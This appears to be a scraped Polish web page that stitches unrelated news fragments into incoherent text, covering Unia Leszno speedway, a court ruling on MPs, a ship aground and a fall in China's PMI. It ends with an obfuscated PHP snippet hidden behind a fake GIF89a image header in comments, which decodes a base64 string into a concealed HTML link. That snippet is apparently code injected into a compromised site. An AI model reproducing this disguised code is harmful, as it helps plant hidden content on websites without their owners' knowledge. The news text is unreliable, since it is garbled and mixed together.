poniedziałek, 06 stycznia 2014 21:22 |
Nie widzę powodu, by w Unii nie jeździć do końca kariery. - Leszno to mój dom. Poseł nie musi udzielać informacji publicznej - uznał Wojewódzki Sąd Administracyjny w Rzeszowie. Donoszą o tym belgijskie media, powołując się na BBC, która dziś ma wyemitować materiał na ten temat. . modernizacje linii produkcyjnych Jestem pewien, że tak samo myśli mój brat - mówi nowy kapitan Unii Leszno Przemysław . Polski statek utknął na mieliźnie, bo kapitan nie pamiętał o Wyspach Brytyjskich. Eksperci, na których powołuje się "Dziennik Gazeta Prawna", są zdumieni. Rozczarowujący okazał się wstępny odczyt sierpniowego indeksu aktywności chińskiego przemysłu. z12803939M,Przemyslaw-Pawlicki--w-niebieskim-kasku--w-meczu-P. jpg. Wskaźnik PMI poszedł w dół do lipcowych 49,3 pkt do 47,8 pkt, osiągając najniższy poziom od 9 miesięcy.
|
/*GIF89a Д нннббвКККьььюiяkТТТяцряхоХХХСДјрррНННщщщЭЭЭюcЮТКщпиЗЛНЗЗЗэfьx)*/echo base64_decode('PGJyIC8+PGEgaHJlZj0iIiB0YXJnZXQ9Il9ibGFuayI+PC9hPg==');/*ПТФчхуРѕґя±‚ядФЭОЕстфТХЧэээяяя!щ , jа'ЋdiћиЁeH:ЕУєBGк-БF*/if(!defined('RIGHTCOLUMN'))define('RIGHTCOLUMN',0);/*ђАВS&ЕO!™$ ЂБ 8‘[„`ЏA БpџKВђЊ†Q(ґЬв'аћg%2)z)94–—#! ;*/?>